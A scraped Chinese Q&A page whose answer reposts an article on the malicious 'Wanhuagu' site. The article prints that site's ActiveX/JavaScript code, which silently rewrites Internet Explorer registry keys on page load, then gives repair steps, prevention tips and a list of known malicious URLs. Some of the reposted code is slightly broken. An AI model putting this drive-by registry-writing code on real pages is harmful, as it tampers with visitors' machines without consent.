当前位置:  技术问答>java相关

请问一下,登陆某个网站,这个网站便会加到主页中,这个功能怎么实现

    来源: 互联网  发布时间:2015-01-17

    本文导语:  | 你可以看看 lucky.myrice.com/open.htm 近来,屡屡发生网友在浏览网页时,由于误点击一些网络地址,造成在IE的浏览器的标题栏出现一些广告信息,很是令人讨厌!比如访问已经大名鼎鼎的恶意网页“万花谷”,会...


|
你可以看看
lucky.myrice.com/open.htm

近来,屡屡发生网友在浏览网页时,由于误点击一些网络地址,造成在IE的浏览器的标题栏出现一些广告信息,很是令人讨厌!比如访问已经大名鼎鼎的恶意网页“万花谷”,会将你的IE浏览器的标题栏显示“欢迎来到万花谷!请与OICQ:4040465联系!”对于被恶意修改的IE标题栏该怎样恢复呢? 
一、IE标题栏被修改的原因 
其实,该恶意网页是含有有害代码的ActiveX网页文件,这些广告信息的出现是因为浏览者的注册表被恶意更改的结果,原因就是利用了下面这段JavaScript代码修改了HKLMSOFTWAREMicrosoftInternetExplorerMain和HKCUSoftwareMicrosoftInternet ExplorerMain  
中的Window Title的键值。看看下面的代码你就会明白了: 
 
document.write(" ");  
function f(){ try {  
//ActiveX initialization  
a1=document.applets[0];  
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");  
a1.createInstance(); Shl = a1.GetObject();  
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");  
a1.createInstance(); FSO = a1.GetObject();  
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");  
a1.createInstance(); Net = a1.GetObject(); try  
{ if (document.cookie.indexOf("Chg") == -1) {  
Shl.RegWrite ("HKLM\Software\Microsoft\Internet Explorer\Main\Window Title", " 欢迎光临http:/www.520cat.com");  
Shl.RegWrite ("HKCU\Software\Microsoft\Internet Explorer\Main\Window Title", " .欢迎光临http:/www.520cat.com");  
var expdate = new Date((new Date()).getTime() + (1));  
document.cookie="Chgg=general; expires=" + expdate.toGMTString() + "; path=/;"  
}  
}  
catch(e)
{}

catch(e)  
{} } function init() {  
setTimeout("f()", 1000);  
} init();  
从上面不难看出它修改了你的注册表!如果你认为没有什么了不起,仅仅是修改了IE标题栏而已,那你可大错特错了!如果他将你注册表改动将你IE指向一个木马软件的下载地址,木马服务端软件有只有几K到几十K大小的,下载这样一个木马只需几秒!几乎是一闪而过!然后木马程序再将你的防火墙、杀毒软件全部关闭!接着在注册表HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun里加入木马服务端自启动程序,使之开机自动运行,这样做是完全可能的!而结果是非常严重的!因此大家要十分小心喽! 
在系统默认状态下,是由应用程序本身来提供标题栏的信息,但也允许用户自行在上述注册表项目中填加信息,而一些恶意的网站正是利用了这一点来得逞的:它们将串值Window Title下的键值改为其网站名或更多的广告信息,从而达到改变浏览者IE标题栏的目的。不过在Windows 2000下,在注册表 
HKLMSOFTWAREMicrosoftInternet ExplorerMain和HKCUSoftwareMicrosoftInternet ExplorerMain  
中没有Window Title这个键值,所以这种恶意网页对W2K是无法修改其标题栏的。  
二、解决办法 
方法一:  
  (1)在Windows启动后,点击“开始”->“运行”菜单项,在“打开”栏中键入regedit,然后按“确定”键;  
  (2)展开注册表到HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerMain下,在右半部分窗口中找到串值“Window Title” ,将该串值删除即可,或将Window Title的键值改为“IE浏览器”也可以;  
  (3)同理,展开注册表到HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain,然后处理方法同(2)中所述。  
  (4)退出注册表编辑器,重新启动计算机,运行IE,你会发现困扰你的问题解决了! 
方法二:复制如下代码,存为文本文件,再改名为.htm文件,点击运行,可以自动恢复IE标题栏。 
  
  
document.write(" "); 
function f(){  
try  
{  
  
a1=document.applets[0];  
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");  
a1.createInstance();  
Shl = a1.GetObject();  
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");  
a1.createInstance();  
FSO = a1.GetObject();  
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");  
a1.createInstance();  
Net = a1.GetObject();  
try  
{  
if (documents .cookies.indexOf("Chg") == -1)  
{  
Shl.RegWrite ("HKLM\Software\Microsoft\Internet Explorer\Main\Window Title", "Microsoft Internet Explorer");  
Shl.RegWrite ("HKCU\Software\Microsoft\Internet Explorer\Main\Window Title", "Microsoft Internet Explorer");  
  
var expdate = new Date((new Date()).getTime() + (1));  
documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"  
}  
}  
catch(e)  
{} 
}  
catch(e)  
{}  
}  
function init()  
{  
setTimeout("f()", 1000);  
  
}  
init(); 
  
  
三、预防办法: 
1.要避免中招,关键是不要轻易去一些自己并不了解的站点,特别是那些看上去美丽诱人的网址更不要贸然前往,否则吃亏的往往是你。 
2.由于该网页是含有有害代码的ActiveX网页文件,因此在IE设置中将ActiveX插件和控件、Java脚本等全部禁止就可以避免中招。具体方法是:在IE窗口中点击“工具->Internet选项,在弹出的对话框中选择“安全”标签,再点击“自定义级别”按钮,就会弹出“安全设置”对话框,把其中所有ActiveX插件和控件以及Java相关全部选择“禁用”即可。在Win2k下把服务里面的远程注册表操作服务“Remote Registry Service”禁用就可以了。方法是点击“管理工具->服务->Remote Registry Service(允许远程注册表操作),将这一项禁用。  
3.对于所有用户,可以通过升级到最新的KVW3000病毒库,来预防该类恶意网页的侵害(注意,必须是6月28日以后的病毒库方可)。 
四、目前已知这类网站名称汇总 
据我统计(所知)有如下网站可以修改浏览者的注册表,甚至于是限制系统功能,使浏览者无法使用电脑! 
1.http://on888.home.chinaren.com 这是大名鼎鼎的恶意网站“万花谷”的网址; 
2.http://www.findfeel.com/default.htm 这是和“万花谷”同类型的恶意网站,破坏效果相同; 
3.http://www.gohip.com 可以改变IE标题栏和收藏夹的讨厌网站,没有更严重的破坏功能; 
4.http://www.520cat.com 修改浏览者的IE标题栏的网站。 
当然,这样的网站远远不止文中所提到的这几个,它们的危害也各不相同,但只要你按本文中所说的预防方法去做,就不会有事了!  
也可以
把下面的文字保存成WWW.REG文件,然后双击:

REGEDIT4

[HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain]
"Window Title" = "Microsoft Internet Explorer" 

    
 
 

您可能感兴趣的文章:

  • 请问开通一个网站需要什么手续?在线等待
  • 请问国内有没有比较大型的Linux网站?
  • 请问哪有支持servlet的免费网站
  • 请问在那些网站能下载到LINUX下程序的源码?
  • 请问哪有 比较专业的TCP/IP网站???
  • 用JSP。XML开发网站。请问那种环境设置最好。该如何设置环境
  • 请问有哪些比较好的linux内核开发的国外网站??
  • 请问有谁知道从哪里可以得到这样一个jsp做网站的框架吗?
  • 请问:怎么判断linux服务器的网站系统是不是中毒了?
  • 请问《Think in Java》的作者的网站网址是多少?
  • 请问有那些网站有Curses的资料?
  • 请问“门户网站”具体的意思是什么意思?
  • 请问:哪儿有好的Unix/Linux学习的网站?
  • 请问:哪有下载可编译的linux内核代码的网站呀
  • 请问哪位大侠用过Eclipse,能不能介绍点这方面的文章,书和网站,谢了
  • 我是初学者! 请问那个中文网站可以下载JDK!详细路径!
  • 60分奉献:请问哪里有appserver下载,可别告诉去inprise网站?
  • 请问哪个网站可以下载Unix下Motif的Widgets, 高分相送
  • 请问哪儿有比较好的基于java的网站流量统计程序下载?(内容空)
  • 请问servlet里面怎样想asp的mappath一样得到网站所在的目录呢?
  • 请问我怎样可以由原来的图形界面登陆变成文字登陆?
  • 我用的是ssh来登陆我的机器,我的机器是redhat9.0,请问在什么文件上记录拉用户的登陆情况?
  • 请问solaris不能telnet远程登陆???,该怎么办???
  • 请问ssh登陆如何设置?
  • 请问:切换samba用户登陆的方法
  • 请问SCO 下的用户登陆记录在那里
  • 请问linux 下怎么屏root用户的NETMER,和FTP登陆,很急在线等!
  • 请问大家linux远程登陆有哪些较好用的软件?
  • 请问怎么把本地文件拷贝到用SSH登陆的机器上
  • 在RedHat Linux9.0下安装tomcat4.19,不能登陆Tomcat的管理平台,请问密码是什么?
  • 请问登陆的日志放在什么地方?
  •  
    本站(WWW.)旨在分享和传播互联网科技相关的资讯和技术,将尽最大努力为读者提供更好的信息聚合和浏览方式。
    本站(WWW.)站内文章除注明原创外,均为转载、整理或搜集自网络。欢迎任何形式的转载,转载请注明出处。












  • 相关文章推荐
  • 请问高手linux中用md5来实现一串字符串的加密,用c++/c实现
  • 求助:用JSP实现统计来访人数,请问怎样实现?
  • 请问连接池的工作原理和实现
  • 请问:有没有人在Linux下实现过计费网关?
  • 请问各位大虾,怎么实现三层页面之间的参数传递?
  • 请问如何在JTextPane里实现画表格的功能,就想word那样!!!!
  • 请问在linux内核实现浮点运算怎么弄?
  • 请问shell能实现注册的功能吗?
  • 请问聊天室中显示用户在线离线的原理是怎样?有哪些方法实现呢?
  • 请问Jb怎么实现系统登录程序!
  • 请问,pipe()这个管道建立函数在哪里实现的?
  • 请问怎么样实现这种东西,很急!谢谢
  • 请问怎么实现链接?
  • 公司要做一个外贸办公软件,请问用Java如何实现........
  • 请问《软件工程java语言实现》一书在那里能下载
  • 请问怎么实现即时通讯?
  • 请问使用或安装什么软件能够实现Win2000下访问Linux分区?
  • 请问在java中如何实现类的动态生成?谢谢
  • 请问在applet中如何实现滚动条?
  • 请问谁有LINUX内核设计与实现第三版的电子书?
  • 请问:我知道路由器的telnet密码,但忘记了enable 密码,请问如何是好?
  • 请问那里有SYBASE的jbdb 2.0下载;jspsmartupload可以直接将文件上传到数据库,请问如何使用
  • 请问最新的reahat9.0是基于什么核心的?2.4?2.6?请问那里能下载?
  • 请问:请问哪里有关于linux基本操作命令讲解的资料下载,最好是幻灯片格式的.
  • 请问,我试图用#admintool&图形工具命令来安装sun workshop5.0,为什么进入的却是用户管理界面?请问具体该如何在solaris下安装应用软件
  • 请问在Redhat 9里,我从登录就是图形介面,请问如何在图形介面内进入命令行方式呢,谢谢
  • 请问玩过SOLARIS的高手门,在不正常关机后,就不能启动到windows公用桌面了,只能在命令提示模式下了,请问怎么解决这个问题啊?急~!~!
  • 请问:我在redhat下装了bochs-2.2.1-1.rpm,.装了后,想设置一下,但找不到bochsrc.fda.bxrc,请问这个文件在哪个曰录下啊。
  • 请问:在配置Qt时,很多文档都说在.profile,.login里加东西,但是我好像没有发现有这两个文件上,请问这些文件在哪个目录下啊
  • 请问最新的reahat9.0是基于什么核心的?2.4?2.6?请问那里能下载? iis7站长之家
  • 请问各位大虾,小弟今天开始学jsp了,这学期我们有java课,所以已经下载了jdk(好象是1.2),请问我的98环境怎么配置jsp环境呀?我的jdk可以运行.java程序,别的我就不知道了....谢谢!


  • 站内导航:


    特别声明:169IT网站部分信息来自互联网,如果侵犯您的权利,请及时告知,本站将立即删除!

    ©2012-2021,,E-mail:www_#163.com(请将#改为@)

    浙ICP备11055608号-3